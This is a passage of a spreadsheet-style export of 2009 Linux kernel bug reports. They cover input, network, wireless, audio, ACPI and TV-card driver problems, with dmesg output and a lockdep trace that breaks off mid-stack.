    <t>When I use my wireless Mighty Mouse to horizontal scroll, it is inverted (moving the ball right scrolls left, and vice versa). I believe this is because the APPLE_INVERT_HWHEEL quirk is added to the wireless Mighty Mouse when it does not need to be. There is more discussion at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/291408 From /proc/bus/input/devices: I: Bus=0005 Vendor=05ac Product=030c Version=0200 N: Name="martey’s mouse" P: Phys=00:22:68:EB:7E:F8 S: Sysfs=/devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.0/bluetooth/hci0/hci0:11/input32 U: Uniq=00:14:51:CC:3B:59 H: Handlers=mouse3 event11 B: EV=100017 B: KEY=f0000 0 0 0 0 0 0 0 0 B: REL=143 B: MSC=10</t>
  </si>
  <si>
    <t>forcedeth: no link during initialization</t>
  </si>
  <si>
    <t>2009-04-25 20:10 UTC</t>
  </si>
  <si>
    <t>2009-05-30 20:40 UTC</t>
  </si>
  <si>
    <t>Subject : forcedeth, 2.6.29.1: no link during initialization Submitter : Harald Dunkel &lt;harald.dunkel@t-online.de&gt; Date : 2009-04-23 13:02 References : http://marc.info/?l=linux-kernel&amp;m=124049180309233&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Left audio channel broken after resume from suspend with Intel HDA</t>
  </si>
  <si>
    <t>2009-04-25 20:16 UTC</t>
  </si>
  <si>
    <t>2009-05-15 22:02 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29 regression: left audio channel broken after resume from suspend with Intel HDA Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2009-04-20 18:40 References : http://marc.info/?l=linux-kernel&amp;m=124025290831292&amp;w=4 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cpufreq timer teardown problem</t>
  </si>
  <si>
    <t>2009-04-25 20:31 UTC</t>
  </si>
  <si>
    <t>2009-05-30 22:12 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.29.1 debugobjects warning Submitter : Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; Date : 2009-04-23 14:00 References : http://marc.info/?l=linux-kernel&amp;m=124049523515036&amp;w=4 Handled-By : Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; Patch : http://patchwork.kernel.org/patch/19754/ Patch : http://patchwork.kernel.org/patch/19753/ This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>RTL818x missing IBSS support</t>
  </si>
  <si>
    <t>2009-04-27 11:19 UTC</t>
  </si>
  <si>
    <t>David Heidelberg (okias)</t>
  </si>
  <si>
    <t>2010-07-19 20:52 UTC</t>
  </si>
  <si>
    <t>Please add IBSS (Ad-hoc) support to at least RTL8180L. Thank you</t>
  </si>
  <si>
    <t>Linux doesn't boot because of incorrect DSDT unless acpi=off/acpi=ht - Panasonic Toughbook CF-52</t>
  </si>
  <si>
    <t>2009-04-27 13:48 UTC</t>
  </si>
  <si>
    <t>Brad Landis</t>
  </si>
  <si>
    <t>2012-01-26 21:50 UTC</t>
  </si>
  <si>
    <t>I am using a Panasonic Toughbook CF-52, and I am seeing the original issue experienced in bug 9915 (http://bugzilla.kernel.org/show_bug.cgi?id=9915), but it was closed because. I cannot boot into linux without acpi=off or acpi=ht. I am using Ubuntu 9.04, but I, and some coworkers, have tried most popular distributions, but all of them require acpi be changed.</t>
  </si>
  <si>
    <t>ath5k: nonfunctional, floods of "noise floor calibration failed" on cold boot</t>
  </si>
  <si>
    <t>2.6.26, 2.6.27, 2.6.28, 2.6.29</t>
  </si>
  <si>
    <t>2009-04-27 23:33 UTC</t>
  </si>
  <si>
    <t>Zack Weinberg</t>
  </si>
  <si>
    <t>2012-07-14 16:26 UTC</t>
  </si>
  <si>
    <t>I have a Thinkpad T61. Most of the time the wireless hardware works reliably with the ath5k driver, but occasionally (less than once a week) something happens that causes the wireless to become completely nonfunctional. I can tell when this has happened because there is a flood of "noise floor calibration timeout" messages on boot. Once this starts happening, it will persist across multiple cold boots, even if I remove the battery and let the computer sit for several minutes, or boot into Windows and then back into Linux (the Windows driver has no problem with the card when it's in this state, however). Some time later (hours, usually) it will stop happening as mysteriously as it started. I have observed this problem with the Debian packaged versions of kernels 2.6.27, .28, and .29 (pre-.27, I had to use madwifi). I would attach dmesg logs, lspci output, etc., but I am writing this bug report from Windows, with the card in the nonfunctional state. As soon as the card starts working again in Linux I will follow up with this information. This seems akin to bug 12080 but not exactly the same. It was originally reported as Debian bug 503544 [link in URL].</t>
  </si>
  <si>
    <t>Zolid Hybrid TV Card not working</t>
  </si>
  <si>
    <t>2009-04-30 15:42 UTC</t>
  </si>
  <si>
    <t>Sander Pientka</t>
  </si>
  <si>
    <t>2012-05-30 16:38 UTC</t>
  </si>
  <si>
    <t>The Zolid Hybrid TV Card I bought at the local supermarket doesn't seem to be recognized by Linux. This TV card has support for both analog and digital television (DVB-T). The included software is, of course, Windows-only. The video processing chipset is the SAA7131/SAA7133/SAA7135 Video Broadcast Decoder, according to lshw. The Linux kernel loads the saa* drivers for this card. However, it's not working. Scanning the frequencies doesn't result anything. dmesg | grep saa results this: sander@sander-desktop:~$ dmesg | grep saa [ 11.222137] saa7130/34: v4l2 driver version 0.2.14 loaded [ 11.228921] saa7134 0000:04:09.0: PCI INT A -&gt; Link[APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 11.228928] saa7133[0]: found at 0000:04:09.0, rev: 209, irq: 17, latency: 32, mmio: 0xfdcfe000 [ 11.228935] saa7133[0]: subsystem: 1131:2004, board: UNKNOWN/GENERIC [card=0,autodetected] [ 11.229015] saa7133[0]: board init: gpio is 0 [ 11.384023] saa7133[0]: i2c eeprom 00: 31 11 04 20 54 20 1c 00 43 43 a9 1c 55 d2 b2 92 [ 11.384032] saa7133[0]: i2c eeprom 10: 00 ff 86 0f ff 20 ff ff ff ff ff ff ff ff ff ff [ 11.384039] saa7133[0]: i2c eeprom 20: 01 40 01 02 03 01 01 03 08 ff 00 b2 ff ff ff ff [ 11.384046] saa7133[0]: i2c eeprom 30: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384052] saa7133[0]: i2c eeprom 40: ff 35 00 c0 96 10 03 32 21 05 ff ff ff ff ff ff [ 11.384058] saa7133[0]: i2c eeprom 50: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384064] saa7133[0]: i2c eeprom 60: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384071] saa7133[0]: i2c eeprom 70: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384077] saa7133[0]: i2c eeprom 80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384083] saa7133[0]: i2c eeprom 90: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384090] saa7133[0]: i2c eeprom a0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384096] saa7133[0]: i2c eeprom b0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384102] saa7133[0]: i2c eeprom c0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384108] saa7133[0]: i2c eeprom d0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384115] saa7133[0]: i2c eeprom e0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384121] saa7133[0]: i2c eeprom f0: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.384574] saa7133[0]: registered device video0 [v4l2] [ 11.384664] saa7133[0]: registered device vbi0 [ 11.394074] saa7134 ALSA driver for DMA sound loaded [ 11.394103] saa7133[0]/alsa: saa7133[0] at 0xfdcfe000 irq 17 registered as card -2 [ 523.060040] saa7133[0]: board init: gpio is 0 [ 525.107542] Modules linked in: aes_i586 aes_generic bridge stp bnep vboxnetflt vboxdrv video output input_polldev lp arc4 ecb snd_hda_intel saa7134_alsa snd_pcm_oss snd_mixer_oss snd_pcm rt73usb snd_seq_dummy crc_itu_t snd_seq_oss rt2x00usb rt2x00lib snd_seq_midi snd_rawmidi led_class snd_seq_midi_event snd_seq snd_timer snd_seq_device saa7134 mac80211 ir_common psmouse ppdev videodev v4l1_compat compat_ioctl32 v4l2_common videobuf_dma_sg videobuf_core tveeprom snd soundcore snd_page_alloc cfg80211 serio_raw pcspkr k8temp nvidia(P) i2c_nforce2 joydev agpgart parport_pc parport usbhid forcedeth ohci1394 ieee1394 fbcon tileblit font bitblit softcursor sander@sander-desktop:~$ As you can see, the driver can't recognize the board, so it uses the default settings. I'm sure you can fix it by adding a certain ID or board map. Please fix this, so I can watch TV again :) Thanks in advance.</t>
  </si>
  <si>
    <t>Intel 440GX: Since kernel 2.6.30-rc1, computers hangs randomly but not with kernel &lt;= 2.6.29.6</t>
  </si>
  <si>
    <t>2.6.30-rc1-8, 2.6.30, 2.6.30.1-2.6.30.3, 2.6.31-rc3-rc5</t>
  </si>
  <si>
    <t>2009-05-01 16:57 UTC</t>
  </si>
  <si>
    <t>David Hill</t>
  </si>
  <si>
    <t>2009-08-26 20:48 UTC</t>
  </si>
  <si>
    <t>The screen remains black and nothing is visible in the log files. I can debug if needed, apply patches if required.</t>
  </si>
  <si>
    <t>IPv6 Privacy extension, temporary are not regenerated properly.</t>
  </si>
  <si>
    <t>2.6.30-rc4</t>
  </si>
  <si>
    <t>2009-05-01 21:22 UTC</t>
  </si>
  <si>
    <t>2012-05-30 16:40 UTC</t>
  </si>
  <si>
    <t>Temporary addresses aren't regenerated properly if: 1) temp_prefered_lft - desync_factor &lt; ADDR_CHECK_FREQUENCY. Address verification do not schedule generating of a new address but deprecates the address during the first verification after it is created. 2) temp_valid_lft changes between verifications so that there is no chance for an address to become deprecated. If any of the above happens there is no chance to create new valid and preferred temporary address because they are created only when: 1) a new public is created 2) a temporary address is going to be deprecated. (it needs to be verified at least ones as valid and preferred in addrconf_verify()) All in all we end up with no temporary address and no chance to get one. PS. I'll try to work it out this weekend.</t>
  </si>
  <si>
    <t>compat-wireless: Frequent Probe Response timeouts and disassociations</t>
  </si>
  <si>
    <t>2009-05-02 18:08 UTC</t>
  </si>
  <si>
    <t>2009-08-02 20:10 UTC</t>
  </si>
  <si>
    <t>Current mainline with the ath9k from compat-wireless causes frequent disconnects due to probe response timeouts. Mainline sans the commit 47afbaf5af9454a7a1a64591e20cbfcc27ca67a8 was the last correctly working kernel version. Fix for 47afbaf5af9454a7a1a64591e20cbfcc27ca67a8 is known and expected to land in mainline shortly but the fix already exists in compat-wireless, testing of which uncovered this separate bug - [ 340.966352] ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready [ 351.852009] wlan1: no IPv6 routers present [ 376.916017] wlan1: no probe response from AP 00:1e:e5:6a:2c:c2 - disassociating [ 377.765211] wlan1: authenticate with AP 00:1e:e5:6a:2c:c2 [ 377.767276] wlan1: authenticated [ 377.767281] wlan1: associate with AP 00:1e:e5:6a:2c:c2 [ 377.771343] wlan1: RX ReassocResp from 00:1e:e5:6a:2c:c2 (capab=0x411 status=0 aid=1) [ 377.771346] wlan1: associated [ 412.704016] wlan1: no probe response from AP 00:1e:e5:6a:2c:c2 - disassociating [ 413.549010] wlan1: authenticate with AP 00:1e:e5:6a:2c:c2 [ 413.551662] wlan1: authenticated [ 413.551667] wlan1: associate with AP 00:1e:e5:6a:2c:c2 [ 413.555733] wlan1: RX ReassocResp from 00:1e:e5:6a:2c:c2 (capab=0x411 status=0 aid=1) [ 413.555736] wlan1: associated [ 663.008267] wlan1: no probe response from AP 00:1e:e5:6a:2c:c2 - disassociating [ 663.848934] wlan1: authenticate with AP 00:1e:e5:6a:2c:c2 [ 663.853677] wlan1: authenticate with AP 00:1e:e5:6a:2c:c2 [ 663.855729] wlan1: authenticated [ 663.855731] wlan1: associate with AP 00:1e:e5:6a:2c:c2 [ 663.862015] wlan1: RX ReassocResp from 00:1e:e5:6a:2c:c2 (capab=0x411 status=0 aid=1) [ 663.862020] wlan1: associated [ 698.284016] wlan1: no probe response from AP 00:1e:e5:6a:2c:c2 - disassociating</t>
  </si>
  <si>
    <t>iwl3945 -- INFO: possible irq lock inversion dependency detected</t>
  </si>
  <si>
    <t>2009-05-02 20:22 UTC</t>
  </si>
  <si>
    <t>2009-06-04 17:00 UTC</t>
  </si>
  <si>
    <t>[ 4573.319715] [ INFO: possible irq lock inversion dependency detected ] [ 4573.319723] 2.6.30-rc4 #3 [ 4573.319728] --------------------------------------------------------- [ 4573.319735] swapper/0 just changed the state of lock: [ 4573.319741] (&amp;(&amp;priv-&gt;scan_check)-&gt;timer){+.-...}, at: [&lt;ffffffff81044e1b&gt;] run_timer_softirq+0x13c/0x26e [ 4573.319766] but this lock was taken by another, HARDIRQ-safe lock in the past: [ 4573.319772] (&amp;priv-&gt;lock){-.-...} [ 4573.319779] [ 4573.319781] and interrupts could create inverse lock ordering between them. [ 4573.319784] [ 4573.319790] [ 4573.319791] other info that might help us debug this: [ 4573.319798] no locks held by swapper/0. [ 4573.319802] [ 4573.319804] the first lock's dependencies: [ 4573.319810] -&gt; (&amp;(&amp;priv-&gt;scan_check)-&gt;timer){+.-...} ops: 87 { [ 4573.319825] HARDIRQ-ON-W at: [ 4573.319832] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.319855] IN-SOFTIRQ-W at: [ 4573.319861] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.319873] INITIAL USE at: [ 4573.319880] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.319895] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.319907] [&lt;ffffffff8104561b&gt;] del_timer_sync+0x3c/0x83 [ 4573.319920] [&lt;ffffffffa017dedb&gt;] iwl3945_mac_add_interface+0x137/0x1a7 [iwl3945] [ 4573.319944] [&lt;ffffffffa00f2462&gt;] ieee80211_open+0x4ce/0x6dd [mac80211] [ 4573.319980] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.319993] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.320005] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.320017] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.320030] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.320042] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.320056] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.320068] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.320080] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.320092] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.320106] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.320118] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.320130] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.320145] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.320156] } [ 4573.320161] ... key at: [&lt;ffffffffa018bf48&gt;] __key.41436+0x0/0xffffffffffff8640 [iwl3945] [ 4573.320183] [ 4573.320185] the second lock's dependencies: [ 4573.320190] -&gt; (&amp;priv-&gt;lock){-.-...} ops: 250343 { [ 4573.320205] IN-HARDIRQ-W at: [ 4573.320211] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.320223] IN-SOFTIRQ-W at: [ 4573.320230] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.320241] INITIAL USE at: [ 4573.320248] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.320261] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.320273] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.320288] [&lt;ffffffffa0161b8c&gt;] iwl_reset_qos+0x19/0x19a [iwlcore] [ 4573.320315] [&lt;ffffffffa017fedd&gt;] iwl3945_pci_probe+0x357/0xcce [iwl3945] [ 4573.320339] [&lt;ffffffff811d54ff&gt;] local_pci_probe+0x12/0x16 [ 4573.320353] [&lt;ffffffff811d61ee&gt;] pci_device_probe+0x5f/0x89 [ 4573.320366] [&lt;ffffffff8127a36d&gt;] driver_probe_device+0x9e/0x143 [ 4573.320380] [&lt;ffffffff8127a46a&gt;] __driver_attach+0x58/0x7b [ 4573.320392] [&lt;ffffffff81279c60&gt;] bus_for_each_dev+0x54/0x8a [ 4573.320404] [&lt;ffffffff8127a1df&gt;] driver_attach+0x1c/0x1e [ 4573.320416] [&lt;ffffffff8127959c&gt;] bus_add_driver+0xb2/0x1e6 [ 4573.320427] [&lt;ffffffff8127a724&gt;] driver_register+0xb6/0x121 [ 4573.320440] [&lt;ffffffff811d6616&gt;] __pci_register_driver+0x61/0xcf [ 4573.320452] [&lt;ffffffffa018e05c&gt;] 0xffffffffa018e05c [ 4573.320464] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.320477] [&lt;ffffffff81068fd4&gt;] sys_init_module+0xab/0x1d3 [ 4573.320490] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.320502] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.320514] } [ 4573.320518] ... key at: [&lt;ffffffffa018bf40&gt;] __key.41486+0x0/0xffffffffffff8648 [iwl3945] [ 4573.320539] -&gt; (pci_lock){......} ops: 9888 { [ 4573.320555] INITIAL USE at: [ 4573.320562] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.320575] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.320587] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.320600] [&lt;ffffffff811cfa4d&gt;] pci_bus_read_config_dword+0x3c/0x87 [ 4573.320613] [&lt;ffffffff813cb7fd&gt;] pci_scan_single_device+0x45/0x13a [ 4573.320627] [&lt;ffffffff811d1388&gt;] pci_scan_slot+0x19/0x94 [ 4573.320639] [&lt;ffffffff813cd084&gt;] pci_scan_child_bus+0x24/0x9e [ 4573.320651] [&lt;ffffffff813cd11c&gt;] pci_scan_bus_parented+0x1e/0x2b [ 4573.320663] [&lt;ffffffff813d1d94&gt;] pci_acpi_scan_root+0xdb/0x26f [ 4573.320675] [&lt;ffffffff813cf09a&gt;] acpi_pci_root_add+0x2a4/0x3cd [ 4573.320688] [&lt;ffffffff811f5d6c&gt;] acpi_device_probe+0x53/0x150 [ 4573.320701] [&lt;ffffffff8127a36d&gt;] driver_probe_device+0x9e/0x143 [ 4573.320714] [&lt;ffffffff8127a46a&gt;] __driver_attach+0x58/0x7b [ 4573.320726] [&lt;ffffffff81279c60&gt;] bus_for_each_dev+0x54/0x8a [ 4573.320738] [&lt;ffffffff8127a1df&gt;] driver_attach+0x1c/0x1e [ 4573.320750] [&lt;ffffffff8127959c&gt;] bus_add_driver+0xb2/0x1e6 [ 4573.320762] [&lt;ffffffff8127a724&gt;] driver_register+0xb6/0x121 [ 4573.320774] [&lt;ffffffff811f7603&gt;] acpi_bus_register_driver+0x3e/0x43 [ 4573.320787] [&lt;ffffffff81644cf4&gt;] acpi_pci_root_init+0x19/0x28 [ 4573.320800] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.320813] [&lt;ffffffff8162263d&gt;] kernel_init+0x12d/0x183 [ 4573.320825] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.320836] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.320848] } [ 4573.320852] ... key at: [&lt;ffffffff815cedd8&gt;] pci_lock+0x18/0x30 [ 4573.320865] -&gt; (pci_config_lock){......} ops: 9990 { [ 4573.320880] INITIAL USE at: [ 4573.320888] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.320901] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.320913] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.320926] [&lt;ffffffff8130043d&gt;] pci_conf1_read+0x5b/0xe2 [ 4573.320938] [&lt;ffffffff8164c054&gt;] __pci_mmcfg_init+0x8f/0x2f5 [ 4573.320952] [&lt;ffffffff8164c2d5&gt;] pci_mmcfg_early_init+0xe/0x10 [ 4573.320964] [&lt;ffffffff8164b45f&gt;] pci_arch_init+0x1e/0x57 [ 4573.320976] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.320989] [&lt;ffffffff8162263d&gt;] kernel_init+0x12d/0x183 [ 4573.321000] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.321011] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.321022] } [ 4573.321026] ... key at: [&lt;ffffffff815f1328&gt;] pci_config_lock+0x18/0x30 [ 4573.321040] ... acquired at: [ 4573.321044] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.321055] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.321067] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.321078] [&lt;ffffffff8130043d&gt;] pci_conf1_read+0x5b/0xe2 [ 4573.321088] [&lt;ffffffff813018fe&gt;] raw_pci_read+0x1e/0x36 [ 4573.321100] [&lt;ffffffff81301975&gt;] pci_read+0x27/0x29 [ 4573.321110] [&lt;ffffffff811cfa6b&gt;] pci_bus_read_config_dword+0x5a/0x87 [ 4573.321121] [&lt;ffffffff813cb7fd&gt;] pci_scan_single_device+0x45/0x13a [ 4573.321132] [&lt;ffffffff811d1388&gt;] pci_scan_slot+0x19/0x94 [ 4573.321142] [&lt;ffffffff813cd084&gt;] pci_scan_child_bus+0x24/0x9e [ 4573.321153] [&lt;ffffffff813cd11c&gt;] pci_scan_bus_parented+0x1e/0x2b [ 4573.321164] [&lt;ffffffff813d1d94&gt;] pci_acpi_scan_root+0xdb/0x26f [ 4573.321174] [&lt;ffffffff813cf09a&gt;] acpi_pci_root_add+0x2a4/0x3cd [ 4573.321186] [&lt;ffffffff811f5d6c&gt;] acpi_device_probe+0x53/0x150 [ 4573.321197] [&lt;ffffffff8127a36d&gt;] driver_probe_device+0x9e/0x143 [ 4573.321208] [&lt;ffffffff8127a46a&gt;] __driver_attach+0x58/0x7b [ 4573.321219] [&lt;ffffffff81279c60&gt;] bus_for_each_dev+0x54/0x8a [ 4573.321230] [&lt;ffffffff8127a1df&gt;] driver_attach+0x1c/0x1e [ 4573.321240] [&lt;ffffffff8127959c&gt;] bus_add_driver+0xb2/0x1e6 [ 4573.321251] [&lt;ffffffff8127a724&gt;] driver_register+0xb6/0x121 [ 4573.321262] [&lt;ffffffff811f7603&gt;] acpi_bus_register_driver+0x3e/0x43 [ 4573.321273] [&lt;ffffffff81644cf4&gt;] acpi_pci_root_init+0x19/0x28 [ 4573.321283] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.321294] [&lt;ffffffff8162263d&gt;] kernel_init+0x12d/0x183 [ 4573.321304] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.321313] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.321323] [ 4573.321328] ... acquired at: [ 4573.321332] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.321344] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.321355] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.321366] [&lt;ffffffff811cfad4&gt;] pci_bus_read_config_word+0x3c/0x88 [ 4573.321377] [&lt;ffffffff811d1e20&gt;] pci_find_capability+0x2c/0x71 [ 4573.321388] [&lt;ffffffffa0164cb6&gt;] iwl_power_initialize+0x63/0xd4 [iwlcore] [ 4573.321415] [&lt;ffffffffa0181dfb&gt;] iwl3945_apm_init+0xf/0xc3 [iwl3945] [ 4573.321437] [&lt;ffffffffa0182b6a&gt;] iwl3945_hw_nic_init+0x3b/0x3bc [iwl3945] [ 4573.321459] [&lt;ffffffffa017b019&gt;] __iwl3945_up+0x14d/0x24a [iwl3945] [ 4573.321479] [&lt;ffffffffa017b754&gt;] iwl3945_mac_start+0x5f8/0x794 [iwl3945] [ 4573.321499] [&lt;ffffffffa00f2235&gt;] ieee80211_open+0x2a1/0x6dd [mac80211] [ 4573.321532] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.321542] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.321553] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.321564] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.321575] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.321586] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.321597] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.321608] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.321619] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.321630] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.321641] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.321652] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.321662] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.321674] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.321685] [ 4573.321689] -&gt; (&amp;rxq-&gt;lock){..-...} ops: 286984 { [ 4573.321704] IN-SOFTIRQ-W at: [ 4573.321711] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.321722] INITIAL USE at: [ 4573.321729] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.321742] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.321754] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.321767] [&lt;ffffffffa017e814&gt;] iwl3945_rx_allocate+0x31/0x119 [iwl3945] [ 4573.321790] [&lt;ffffffffa017eeea&gt;] iwl3945_rx_replenish+0x1c/0x43 [iwl3945] [ 4573.321812] [&lt;ffffffffa0182c3a&gt;] iwl3945_hw_nic_init+0x10b/0x3bc [iwl3945] [ 4573.321835] [&lt;ffffffffa017b019&gt;] __iwl3945_up+0x14d/0x24a [iwl3945] [ 4573.321856] [&lt;ffffffffa017b754&gt;] iwl3945_mac_start+0x5f8/0x794 [iwl3945] [ 4573.321877] [&lt;ffffffffa00f2235&gt;] ieee80211_open+0x2a1/0x6dd [mac80211] [ 4573.321911] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.321923] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.321934] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.321946] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.321958] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.321971] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.321984] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.321996] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.322008] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.322020] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.322033] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.322045] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.322057] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.322070] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322082] } [ 4573.322087] ... key at: [&lt;ffffffffa0177b20&gt;] __key.38359+0x0/0xffffffffffff4dcc [iwlcore] [ 4573.322112] -&gt; (&amp;n-&gt;list_lock){-.-...} ops: 938988 { [ 4573.322127] IN-HARDIRQ-W at: [ 4573.322134] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322146] IN-SOFTIRQ-W at: [ 4573.322153] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322164] INITIAL USE at: [ 4573.322171] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322184] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322197] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322209] [&lt;ffffffff810bf155&gt;] unfreeze_slab+0x57/0x124 [ 4573.322223] [&lt;ffffffff810c0341&gt;] __slab_alloc+0x147/0x557 [ 4573.322236] [&lt;ffffffff810c1427&gt;] 